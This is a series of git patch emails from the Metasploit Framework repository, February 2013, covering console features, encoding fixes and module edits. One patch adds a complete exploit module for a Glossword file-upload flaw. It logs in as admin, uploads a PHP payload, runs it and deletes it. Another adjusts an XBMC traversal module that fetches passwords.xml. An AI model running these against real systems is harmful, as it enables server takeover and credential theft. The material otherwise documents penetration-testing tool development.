-2614,10 +2614,25 @@ class Core def cmd_go_pro(*args) unless is_apt - print_line " This command is only available on apt-based installations," + print_line " This command is only available on deb package installations," print_line " such as Kali Linux." return false end + unless metasploit_debian_package_installed + print_warning " You will want to install the 'metasploit' package first." + print_warning " Type 'apt-get install metasploit' to do this now." + return false + end + # If I've gotten this far, I know that this is apt-installed + # and the packages I need are here. + if metasploit_service_running + print_good " Metasploit services are running, launching a browser..." + launch_metasploit_browser + else + print_warning " Starting the Metasploit services. This will take a few minutes." + start_metasploit_service + launch_metasploit_browser + end @@go_pro_opts.parse(args) do |opt, idx, val| case opt when "-h" @@ -2628,6 +2643,18 @@ class Core return true end + def launch_metasploit_browser + end + + def start_metasploit_service + end + + def metasploit_service_running + end + + def metasploit_debian_package_installed + end + # Determines if this is an apt-based install def is_apt File.exists?(File.expand_path(File.join(msfbase_dir, '.apt'))) From 2c0a916c83b164c31f481510ae75c9d83fd6c840 Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Sat, 23 Feb 2013 17:14:30 -0500 Subject: [PATCH 057/139] Made the password optional --- modules/auxiliary/gather/xbmc_traversal.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/xbmc_traversal.rb b/modules/auxiliary/gather/xbmc_traversal.rb index 78124aaa1a..c55c8034d5 100644 --- a/modules/auxiliary/gather/xbmc_traversal.rb +++ b/modules/auxiliary/gather/xbmc_traversal.rb @@ -41,7 +41,7 @@ class Metasploit3 < Msf::Auxiliary OptString.new('FILEPATH', [false, 'The name of the file to download', '/private/var/mobile/Library/Preferences/XBMC/userdata/passwords.xml']), OptInt.new('DEPTH', [true, 'The max traversal depth', 9]), OptString.new('USERNAME', [true, 'The username to use for the HTTP server', 'xbmc']), - OptString.new('PASSWORD', [true, 'The password to use for the HTTP server', 'xbmc']), + OptString.new('PASSWORD', [false, 'The password to use for the HTTP server', 'xbmc']), ], self.class) end From a3886a1a6b54c5d03e540f881e6947b45ea3d01d Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sat, 23 Feb 2013 17:17:18 -0600 Subject: [PATCH 058/139] No smartquotes plz --- lib/msf/ui/console/command_dispatcher/core.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index e80b3ffdd5..c2555cd9c3 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -358,12 +358,12 @@ class Core if is_apt content = [ - "Large pentest? List, sort, group, tag and search your hosts and services\nin Metasploit Pro -- type ‘go_pro’ to launch it now.", - "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- type ‘go_pro’ to launch it now.", - "Save your shells from AV! Upgrade to advanced AV evasion using dynamic\nexe templates with Metasploit Pro -- type ‘go_pro’ to launch it now.", - "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro’s wizard -- type ‘go_pro’ to launch it now.", - "Using notepad to track pentests? Have Metasploit Pro report on hosts,\nservices, sessions and evidence -- type ‘go_pro’ to launch it now.", - "Tired of typing ‘set RHOSTS’? Click & pwn with Metasploit Pro\n-- type ‘go_pro’ to launch it now." + "Large pentest? List, sort, group, tag and search your hosts and services\nin Metasploit Pro -- type 'go_pro' to launch it now.", + "Frustrated with proxy pivoting? Upgrade to layer-2 VPN pivoting with\nMetasploit Pro -- type 'go_pro' to launch it now.", + "Save your shells from AV! Upgrade to advanced AV evasion using dynamic\nexe templates with Metasploit Pro -- type 'go_pro' to launch it now.", + "Easy phishing: Set up email templates, landing pages and listeners\nin Metasploit Pro’s wizard -- type 'go_pro' to launch it now.", + "Using notepad to track pentests? Have Metasploit Pro report on hosts,\nservices, sessions and evidence -- type 'go_pro' to launch it now.", + "Tired of typing ‘set RHOSTS’? Click & pwn with Metasploit Pro\n-- type 'go_pro' to launch it now." ] banner << content.sample # Ruby 1.9-ism! banner << "\n\n" From d5a074283a0468907f367033802532c869d35f0f Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sat, 23 Feb 2013 22:38:23 -0600 Subject: [PATCH 059/139] Fill in the details of starting, launching, etc --- lib/msf/ui/console/command_dispatcher/core.rb | 42 +++++++++++++++++-- 1 file changed, 38 insertions(+), 4 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index c2555cd9c3..8883e7f713 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2618,14 +2618,14 @@ class Core print_line " such as Kali Linux." return false end - unless metasploit_debian_package_installed + unless is_metasploit_debian_package_installed print_warning " You will want to install the 'metasploit' package first." print_warning " Type 'apt-get install metasploit' to do this now." return false end # If I've gotten this far, I know that this is apt-installed # and the packages I need are here. - if metasploit_service_running + if is_metasploit_service_running print_good " Metasploit services are running, launching a browser..." launch_metasploit_browser else @@ -2644,15 +2644,49 @@ class Core end def launch_metasploit_browser + cmd = "/usr/bin/xdg-open" + return unless ::File.executable_real? cmd + svc_log = File.join(msf_base, ".." , "engine", "prosvc_stdout.log") + return unless ::File.readable_real? svc_log + really_started = false + # This method is a little lame but it's a short enough file that it + # shouldn't really matter that we reopen it a few times. + until really_started + select(3,nil,nil,nil) + log_data = ::File.open(svc_log, "rb") {|f| f.read f.stat.size} + really_started = log_data =~ /^\[\*\] Ready/ # This is webserver ready, not totally ready. + print_raw "." unless really_started + end + system(cmd, "https://localhost:3790") end def start_metasploit_service + cmd = "/usr/sbin/service" + return unless ::File.executable_real? cmd + %x{#{cmd} metasploit start}.each_line do |line| + print_status line + end end - def metasploit_service_running + def is_metasploit_service_running + cmd = "/usr/sbin/service" + return unless ::File.executable_real? cmd + services = %x{#{cmd} metasploit status} + expected = "Metasploit %s server is running." + %w{web rpc}.each do |svc| + return false unless services.include?(expected % svc) + end end - def metasploit_debian_package_installed + def is_metasploit_debian_package_installed + cmd = "/usr/bin/dpkg" + return unless ::File.executable_real? cmd + installed_packages = %x{#{cmd} -l 'metasploit'} + installed_packages.each_line do |line| + if line =~ /^.i metasploit / # Yes, trailing space + return true + end + end end # Determines if this is an apt-based install From a7c0d621062389edae7dd03a97e127b0b42fab2d Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sat, 23 Feb 2013 23:33:08 -0600 Subject: [PATCH 060/139] Cleanup after some testing --- lib/msf/ui/console/command_dispatcher/core.rb | 34 +++++++++++++------ 1 file changed, 23 insertions(+), 11 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 8883e7f713..c9a0bc012e 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2620,18 +2620,20 @@ class Core end unless is_metasploit_debian_package_installed print_warning " You will want to install the 'metasploit' package first." - print_warning " Type 'apt-get install metasploit' to do this now." + print_warning " Type 'apt-get install metasploit' to do this now, then try 'go_pro' again." return false end # If I've gotten this far, I know that this is apt-installed # and the packages I need are here. if is_metasploit_service_running - print_good " Metasploit services are running, launching a browser..." launch_metasploit_browser else - print_warning " Starting the Metasploit services. This will take a few minutes." + print_status "Starting the Metasploit services. This can take a little time." start_metasploit_service - launch_metasploit_browser + select(nil,nil,nil,3) + if is_metasploit_service_running + launch_metasploit_browser + end end @@go_pro_opts.parse(args) do |opt, idx, val| case opt @@ -2646,25 +2648,33 @@ class Core def launch_metasploit_browser cmd = "/usr/bin/xdg-open" return unless ::File.executable_real? cmd - svc_log = File.join(msf_base, ".." , "engine", "prosvc_stdout.log") + svc_log = File.expand_path(File.join(msfbase_dir, ".." , "engine", "prosvc_stdout.log")) return unless ::File.readable_real? svc_log really_started = false # This method is a little lame but it's a short enough file that it - # shouldn't really matter that we reopen it a few times. + # shouldn't really matter that we open and close it a few times. until really_started - select(3,nil,nil,nil) + select(nil,nil,nil,3) log_data = ::File.open(svc_log, "rb") {|f| f.read f.stat.size} - really_started = log_data =~ /^\[\*\] Ready/ # This is webserver ready, not totally ready. - print_raw "." unless really_started + really_started = log_data =~ /^\[\*\] Ready/ # This is webserver ready + if really_started + print_line + print_good "The web UI is up and running, connecting with your default browser." + print_good "If this is your first time connecting, you will be presented with" + print_good "a self-signed certificate warning. Accept it to create a new user." + select(nil,nil,nil,7) + system(cmd, "https://localhost:3790") + else + print "." + end end - system(cmd, "https://localhost:3790") end def start_metasploit_service cmd = "/usr/sbin/service" return unless ::File.executable_real? cmd %x{#{cmd} metasploit start}.each_line do |line| - print_status line + print_status line.chomp end end @@ -2676,6 +2686,7 @@ class Core %w{web rpc}.each do |svc| return false unless services.include?(expected % svc) end + return true end def is_metasploit_debian_package_installed @@ -2687,6 +2698,7 @@ class Core return true end end + return false end # Determines if this is an apt-based install From 8caedd42903ac9a5d55cb3fffee636d70baa97d9 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sat, 23 Feb 2013 23:41:04 -0600 Subject: [PATCH 061/139] Can't apt-get install inside msfconsole At least, you can't and expect the service to connect correctly. You must exit msfconsole and restart it for the migrations to take place. --- lib/msf/ui/console/command_dispatcher/core.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index c9a0bc012e..801da07009 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2619,8 +2619,9 @@ class Core return false end unless is_metasploit_debian_package_installed - print_warning " You will want to install the 'metasploit' package first." - print_warning " Type 'apt-get install metasploit' to do this now, then try 'go_pro' again." + print_warning "You needs to install the 'metasploit' package first." + print_warning "Type 'apt-get install metasploit' to do this now, then exit" + print_warning "and restart msfconsole to try again." return false end # If I've gotten this far, I know that this is apt-installed @@ -2633,6 +2634,8 @@ class Core select(nil,nil,nil,3) if is_metasploit_service_running launch_metasploit_browser + else + print_error "Metasploit services aren't running. Type 'service start metasploit' and try again." end end @@go_pro_opts.parse(args) do |opt, idx, val| From 1f46b3aa029111f2b8140c36e07e48a77697aae6 Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 25 Feb 2013 01:59:46 +1030 Subject: [PATCH 062/139] Add Glossword Arbitrary File Upload Vulnerability exploit --- .../multi/http/glossword_upload_exec.rb | 192 ++++++++++++++++++ 1 file changed, 192 insertions(+) create mode 100644 modules/exploits/multi/http/glossword_upload_exec.rb diff --git a/modules/exploits/multi/http/glossword_upload_exec.rb b/modules/exploits/multi/http/glossword_upload_exec.rb new file mode 100644 index 0000000000..74ca5c1a1a --- /dev/null +++ b/modules/exploits/multi/http/glossword_upload_exec.rb @@ -0,0 +1,192 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Glossword v1.8.8 - 1.8.12 Arbitrary File Upload Vulnerability", + 'Description' => %q{ + This module exploits a file upload vulnerability in Glossword + versions 1.8.8 to 1.8.12 when run as a standalone application. + This application has an upload feature that allows an authenticated user + with administrator roles to upload arbitrary files to the 'gw_temp/a/' + directory. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'AkaStep', # Discovery + 'Brendan Coles ' # metasploit exploit + ], + 'References' => + [ + [ 'EDB', '24456' ], + [ 'OSVDB' '89960' ] + ], + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Targets' => [['Automatic Targeting', { 'auto' => true }]], + 'Privileged' => true, + 'DisclosureDate' => "Feb 05 2013", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The path to the web application', '/glossword/1.8/']), + OptString.new('USERNAME', [true, 'The username for Glossword', 'admin']), + OptString.new('PASSWORD', [true, 'The password for Glossword', 'admin']) + ], self.class) + end + + def check + + base = target_uri.path + base << '/' if base[-1, 1] != '/' + peer = "#{rhost}:#{rport}" + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + + # login + print_status("#{peer} - Authenticating as user '#{user}'") + begin + res = login(base, user, pass) + if res and res.code == 200 + print_error("#{peer} - Authentication failed") + return Exploit::CheckCode::Unknown + elsif res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ + print_good("#{peer} - Authenticated successfully") + return Exploit::CheckCode::Appears + end + return Exploit::CheckCode::Safe + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + print_error("#{peer} - Connection failed") + end + return Exploit::CheckCode::Unknown + + end + + def on_new_session(client) + if client.type == "meterpreter" + client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") + client.fs.file.rm("#{@fname}") + else + client.shell_command_token("rm #{@fname}") + end + end + + def upload(base, sid, fname, file) + + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + data = Rex::MIME::Message.new + data.add_part(file, 'application/x-php', nil, "form-data; name=\"file_location\"; filename=\"#{fname}\"") + data.add_part("edit-own", nil, nil, 'form-data; name="a"') + data.add_part("users", nil, nil, 'form-data; name="t"') + data.add_part("Save", nil, nil, 'form-data; name="post"') + data.add_part("#{sid}", nil, nil, 'form-data; name="sid"') + data.add_part("#{user}", nil, nil, 'form-data; name="arPost[login]"') + data.add_part("#{pass}", nil, nil, 'form-data; name="arPost[pass_new]"') + data.add_part("#{pass}", nil, nil, 'form-data; name="arPost[pass_confirm]"') + + data_post = data.to_s + data_post = data_post.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}gw_admin.php", + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data_post, + }) + + return res + end + + def login(base, user, pass) + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => "#{base}gw_login.php", + 'data' => "arPost%5Buser_name%5D=#{user}&arPost%5Buser_pass%5D=#{pass}&arPost%5Blocale_name%5D=en-utf8&a=login&sid=&post=Enter" + }) + return res + + end + + def exploit + + base = target_uri.path + base << '/' if base[-1, 1] != '/' + @peer = "#{rhost}:#{rport}" + @fname= rand_text_alphanumeric(rand(10)+6) + '.php' + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + + # login; get session id and token + print_status("#{@peer} - Authenticating as user '#{user}'") + res = login(base, user, pass) + if res and res.code == 301 and res.headers['set-cookie'] =~ /sid([\da-f]+)=([\da-f]{32})/ + token = "#{$1}" + sid = "#{$2}" + print_good("#{@peer} - Authenticated successfully") + else + fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed") + end + + # upload PHP payload + print_status("#{@peer} - Uploading PHP payload (#{payload.encoded.length} bytes)") + php = %Q|| + begin + res = upload(base, sid, @fname, php) + if res and res.code == 301 and res['location'] =~ /Setting saved/ + print_good("#{@peer} - File uploaded successfully") + else + fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Uploading PHP payload failed") + end + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + + # retrieve PHP file path + print_status("#{@peer} - Locating PHP payload file") + begin + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => "#{base}gw_admin.php?a=edit-own&t=users", + 'cookie' => "sid#{token}=#{sid}" + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + if res and res.code == 200 and res.body =~ / 'GET', + 'uri' => "#{base}#{shell_uri}", + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout + fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") + end + if !res or res.code != 200 + fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Executing payload failed") + end + end +end From 8010cdbd8bf32487f4f36f0126128df7b45e2171 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sun, 24 Feb 2013 09:33:15 -0600 Subject: [PATCH 063/139] Shuffled methods around --- lib/msf/ui/console/command_dispatcher/core.rb | 30 +++++++++++-------- 1 file changed, 17 insertions(+), 13 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 801da07009..16992f3a54 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2613,19 +2613,26 @@ class Core end def cmd_go_pro(*args) + @@go_pro_opts.parse(args) do |opt, idx, val| + case opt + when "-h" + cmd_go_pro_help + return false + end + end unless is_apt print_line " This command is only available on deb package installations," print_line " such as Kali Linux." return false end unless is_metasploit_debian_package_installed - print_warning "You needs to install the 'metasploit' package first." - print_warning "Type 'apt-get install metasploit' to do this now, then exit" + print_warning "You need to install the 'metasploit' package first." + print_warning "Type 'apt-get install -y metasploit' to do this now, then exit" print_warning "and restart msfconsole to try again." return false end - # If I've gotten this far, I know that this is apt-installed - # and the packages I need are here. + # If I've gotten this far, I know that this is apt-installed, the + # metasploit package is here, and I'm ready to rock. if is_metasploit_service_running launch_metasploit_browser else @@ -2638,16 +2645,15 @@ class Core print_error "Metasploit services aren't running. Type 'service start metasploit' and try again." end end - @@go_pro_opts.parse(args) do |opt, idx, val| - case opt - when "-h" - cmd_go_pro_help - return false - end - end return true end + protected + + # + # Go_pro methods -- these are used to start and connect to the + # web UI. + def launch_metasploit_browser cmd = "/usr/bin/xdg-open" return unless ::File.executable_real? cmd @@ -2709,8 +2715,6 @@ class Core File.exists?(File.expand_path(File.join(msfbase_dir, '.apt'))) end -protected - # # Module list enumeration # From 5e1119e2ed04bd0f31bb47cd13d76fac73863260 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Sun, 24 Feb 2013 10:23:07 -0600 Subject: [PATCH 064/139] A little more error handling for browser launches Implement a timeout and deal with the case where xdg-open isn't avialable for whatever reason. --- lib/msf/ui/console/command_dispatcher/core.rb | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 16992f3a54..8d0b37c304 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2656,12 +2656,17 @@ class Core def launch_metasploit_browser cmd = "/usr/bin/xdg-open" - return unless ::File.executable_real? cmd + unless ::File.executable_real? cmd + print_warning "Can't figure out your default browser, please visit https://localhost:3790" + print_warning "to start the web UI version of Metasploit." + return false + end svc_log = File.expand_path(File.join(msfbase_dir, ".." , "engine", "prosvc_stdout.log")) return unless ::File.readable_real? svc_log really_started = false # This method is a little lame but it's a short enough file that it # shouldn't really matter that we open and close it a few times. + timeout = 0 until really_started select(nil,nil,nil,3) log_data = ::File.open(svc_log, "rb") {|f| f.read f.stat.size} @@ -2673,8 +2678,15 @@ class Core print_good "a self-signed certificate warning. Accept it to create a new user." select(nil,nil,nil,7) system(cmd, "https://localhost:3790") + elsif timeout >= 200 # 200 * 3 seconds is 10 minutes and that is tons of time. + print_line + print_warning "For some reason, the web UI didn't start in a timely fashion." + print_warning "You might want to restart the Metasploit services by typing" + print_warning "'service metasploit restart' . Sorry it didn't work out." + return false else print "." + timeout += 1 end end end From 9d9d83cf8b262094fa9c35a9bb888ae4d4d16033 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sun, 24 Feb 2013 11:06:29 -0600 Subject: [PATCH 065/139] Implement per-target arch/platform searches SeeRM #7754 --- lib/msf/core/db_manager.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/db_manager.rb b/lib/msf/core/db_manager.rb index 914d126c71..a5bdf41fef 100644 --- a/lib/msf/core/db_manager.rb +++ b/lib/msf/core/db_manager.rb @@ -497,6 +497,14 @@ class DBManager m.targets.each_index do |i| bits << [ :target, { :index => i, :name => m.targets[i].name.to_s } ] + if m.targets[i].platform + m.targets[i].platform.platforms.each do |name| + bits << [ :platform, { :name => name.to_s.split('::').last.downcase } ] + end + end + if m.targets[i].arch + bits << [ :arch, { :name => m.targets[i].arch.to_s } ] + end end if (m.default_target) @@ -525,7 +533,7 @@ class DBManager res[:stance] = m.passive? ? "passive" : "aggressive" end - res[:bits] = bits + res[:bits] = bits.uniq res end From 8e8fecd20807dadfa561d77624d8ab27dd0c6165 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sun, 24 Feb 2013 13:10:16 -0600 Subject: [PATCH 066/139] Prefer String#encode over Iconv for Ruby 2.0 compat --- lib/rex/text.rb | 23 +++++++++++++++-------- 1 file changed, 15 insertions(+), 8 deletions(-) diff --git a/lib/rex/text.rb b/lib/rex/text.rb index 95d465283a..9db91c0d8e 100644 --- a/lib/rex/text.rb +++ b/lib/rex/text.rb @@ -4,14 +4,15 @@ require 'digest/sha1' require 'stringio' require 'cgi' -begin - old_verbose = $VERBOSE - $VERBOSE = nil - require 'iconv' - require 'zlib' -rescue ::LoadError -ensure - $VERBOSE = old_verbose +%W{ iconv zlib }.each do |libname| + begin + old_verbose = $VERBOSE + $VERBOSE = nil + require libname + rescue ::LoadError + ensure + $VERBOSE = old_verbose + end end module Rex @@ -157,6 +158,12 @@ module Text # Converts ISO-8859-1 to UTF-8 # def self.to_utf8(str) + + if str.respond_to?(:encode) + # Skip over any bytes that fail to convert to UTF-8 + return str.encode('utf-8', { :invalid => :replace, :undef => :replace, :replace => '' }) + end + begin Iconv.iconv("utf-8","iso-8859-1", str).join(" ") rescue From b1355fa3263cfcb71575e14c4b7b722b248add56 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sun, 24 Feb 2013 13:10:40 -0600 Subject: [PATCH 067/139] Avoid utf8 regular expression error in Ruby 2.0 --- lib/rkelly/visitors/evaluation_visitor.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rkelly/visitors/evaluation_visitor.rb b/lib/rkelly/visitors/evaluation_visitor.rb index 6b98b7b903..c7e3aa9607 100644 --- a/lib/rkelly/visitors/evaluation_visitor.rb +++ b/lib/rkelly/visitors/evaluation_visitor.rb @@ -1,3 +1,4 @@ +# -*- coding: binary -*- module RKelly module Visitors class EvaluationVisitor < Visitor From ed93a7932ca97e65f5e5b12e1110630b7c516bc8 Mon Sep 17 00:00:00 2001 From: HD Moore Date: Sun, 24 Feb 2013 13:11:15 -0600 Subject: [PATCH 068/139] Clean up Iconv usage and fix indents --- lib/zip/zip.rb | 159 +++++++++++++++++++++++++++---------------------- 1 file changed, 88 insertions(+), 71 deletions(-) diff --git a/lib/zip/zip.rb b/lib/zip/zip.rb index bb212f613d..096b3dfca3 100755 --- a/lib/zip/zip.rb +++ b/lib/zip/zip.rb @@ -1,6 +1,11 @@ # encoding: ASCII-8BIT require 'delegate' -require 'iconv' + +begin + require 'iconv' +rescue ::LoadError +end + require 'singleton' require 'tempfile' require 'fileutils' @@ -140,15 +145,13 @@ module Zip def open_entry @currentEntry = ZipEntry.read_local_entry(@archiveIO) if (@currentEntry == nil) - @decompressor = NullDecompressor.instance + @decompressor = NullDecompressor.instance elsif @currentEntry.compression_method == ZipEntry::STORED - @decompressor = PassThruDecompressor.new(@archiveIO, - @currentEntry.size) + @decompressor = PassThruDecompressor.new(@archiveIO, @currentEntry.size) elsif @currentEntry.compression_method == ZipEntry::DEFLATED - @decompressor = Inflater.new(@archiveIO) + @decompressor = Inflater.new(@archiveIO) else - raise ZipCompressionMethodError, - "Unsupported compression method #{@currentEntry.compression_method}" + raise ZipCompressionMethodError, "Unsupported compression method #{@currentEntry.compression_method}" end flush return @currentEntry @@ -184,8 +187,8 @@ module Zip def sysread(numberOfBytes = nil, buf = nil) readEverything = (numberOfBytes == nil) while (readEverything || @outputBuffer.length < numberOfBytes) - break if internal_input_finished? - @outputBuffer << internal_produce_input(buf) + break if internal_input_finished? + @outputBuffer << internal_produce_input(buf) end return value_when_finished if @outputBuffer.length==0 && input_finished? endIndex= numberOfBytes==nil ? @outputBuffer.length : numberOfBytes @@ -194,9 +197,9 @@ module Zip def produce_input if (@outputBuffer.empty?) - return internal_produce_input + return internal_produce_input else - return @outputBuffer.slice!(0...(@outputBuffer.length)) + return @outputBuffer.slice!(0...(@outputBuffer.length)) end end @@ -244,14 +247,14 @@ module Zip # TODO: Specialize to handle different behaviour in ruby > 1.7.0 ? def sysread(numberOfBytes = nil, buf = nil) if input_finished? - hasReturnedEmptyStringVal=@hasReturnedEmptyString - @hasReturnedEmptyString=true - return "" unless hasReturnedEmptyStringVal - return nil + hasReturnedEmptyStringVal=@hasReturnedEmptyString + @hasReturnedEmptyString=true + return "" unless hasReturnedEmptyStringVal + return nil end if (numberOfBytes == nil || @readSoFar+numberOfBytes > @charsToRead) - numberOfBytes = @charsToRead-@readSoFar + numberOfBytes = @charsToRead-@readSoFar end @readSoFar += numberOfBytes @inputStream.read(numberOfBytes, buf) @@ -356,14 +359,28 @@ module Zip (@gp_flags & 0b100000000000) != 0 ? "utf8" : "CP437//" end - # Returns the name in the encoding specified by enc - def name_in(enc) - Iconv.conv(enc, name_encoding, @name) + + # Converts string encoding + def encode_string(str, src, dst) + if str.respond_to?(:encode) + str.encode(dst, { :invalid => :replace, :undef => :replace, :replace => '' }) + else + begin + Iconv.conv(dst, src, str) + rescue + raise ::RuntimeError, "Your installation does not support iconv (needed for utf8 conversion)" + end + end end # Returns the name in the encoding specified by enc + def name_in(enc) + encode_string(@name, name_encoding, enc) + end + + # Returns the comment in the encoding specified by enc def comment_in(enc) - Iconv.conv(enc, name_encoding, @name) + encode_string(@comment, name_encoding, enc) end def initialize(zipfile = "", name = "", comment = "", extra = "", @@ -372,7 +389,7 @@ module Zip time = Time.now) super() if name.starts_with("/") - raise ZipEntryNameError, "Illegal ZipEntry name '#{name}', name must not start with /" + raise ZipEntryNameError, "Illegal ZipEntry name '#{name}', name must not start with /" end @localHeaderOffset = 0 @local_header_size = 0 @@ -484,9 +501,9 @@ module Zip onExistsProc ||= proc { false } if directory? - create_directory(destPath, &onExistsProc) + create_directory(destPath, &onExistsProc) elsif file? - write_file(destPath, &onExistsProc) + write_file(destPath, &onExistsProc) elsif symlink? create_symlink(destPath, &onExistsProc) else @@ -520,24 +537,24 @@ module Zip @localHeaderOffset = io.tell staticSizedFieldsBuf = io.read(LOCAL_ENTRY_STATIC_HEADER_LENGTH) unless (staticSizedFieldsBuf.size==LOCAL_ENTRY_STATIC_HEADER_LENGTH) - raise ZipError, "Premature end of file. Not enough data for zip entry local header" + raise ZipError, "Premature end of file. Not enough data for zip entry local header" end @header_signature , - @version , - @fstype , - @gp_flags , - @compression_method, - lastModTime , - lastModDate , - @crc , - @compressed_size , - @size , - nameLength , - extraLength = staticSizedFieldsBuf.unpack('VCCvvvvVVVvv') + @version , + @fstype , + @gp_flags , + @compression_method, + lastModTime , + lastModDate , + @crc , + @compressed_size , + @size , + nameLength , + extraLength = staticSizedFieldsBuf.unpack('VCCvvvvVVVvv') unless (@header_signature == LOCAL_ENTRY_SIGNATURE) - raise ZipError, "Zip local header magic not found at location '#{localHeaderOffset}'" + raise ZipError, "Zip local header magic not found at location '#{localHeaderOffset}'" end set_time(lastModDate, lastModTime) @@ -546,7 +563,7 @@ module Zip extra = io.read(extraLength) if (extra && extra.length != extraLength) - raise ZipError, "Truncated local zip entry header" + raise ZipError, "Truncated local zip entry header" else if ZipExtraField === @extra @extra.merge(extra) @@ -569,17 +586,17 @@ module Zip @localHeaderOffset = io.tell io << - [LOCAL_ENTRY_SIGNATURE , - VERSION_NEEDED_TO_EXTRACT , # version needed to extract - 0 , # @gp_flags , - @compression_method , - @time.to_binary_dos_time , # @lastModTime , - @time.to_binary_dos_date , # @lastModDate , - @crc , - @compressed_size , - @size , - @name ? @name.length : 0, - @extra? @extra.local_length : 0 ].pack('VvvvvvVVVvv') + [LOCAL_ENTRY_SIGNATURE , + VERSION_NEEDED_TO_EXTRACT , # version needed to extract + 0 , # @gp_flags , + @compression_method , + @time.to_binary_dos_time , # @lastModTime , + @time.to_binary_dos_date , # @lastModDate , + @crc , + @compressed_size , + @size , + @name ? @name.length : 0, + @extra? @extra.local_length : 0 ].pack('VvvvvvVVVvv') io << @name io << (@extra ? @extra.to_local_bin : "") end @@ -590,33 +607,33 @@ module Zip def read_c_dir_entry(io) #:nodoc:all staticSizedFieldsBuf = io.read(CDIR_ENTRY_STATIC_HEADER_LENGTH) unless (staticSizedFieldsBuf.size == CDIR_ENTRY_STATIC_HEADER_LENGTH) - raise ZipError, "Premature end of file. Not enough data for zip cdir entry header" + raise ZipError, "Premature end of file. Not enough data for zip cdir entry header" end @header_signature , - @version , # version of encoding software - @fstype , # filesystem type - @versionNeededToExtract, - @gp_flags , - @compression_method , - lastModTime , - lastModDate , - @crc , - @compressed_size , - @size , - nameLength , - extraLength , - commentLength , - diskNumberStart , - @internalFileAttributes, - @externalFileAttributes, - @localHeaderOffset , - @name , - @extra , - @comment = staticSizedFieldsBuf.unpack('VCCvvvvvVVVvvvvvVV') + @version , # version of encoding software + @fstype , # filesystem type + @versionNeededToExtract, + @gp_flags , + @compression_method , + lastModTime , + lastModDate , + @crc , + @compressed_size , + @size , + nameLength , + extraLength , + commentLength , + diskNumberStart , + @internalFileAttributes, + @externalFileAttributes, + @localHeaderOffset , + @name , + @extra , + @comment = 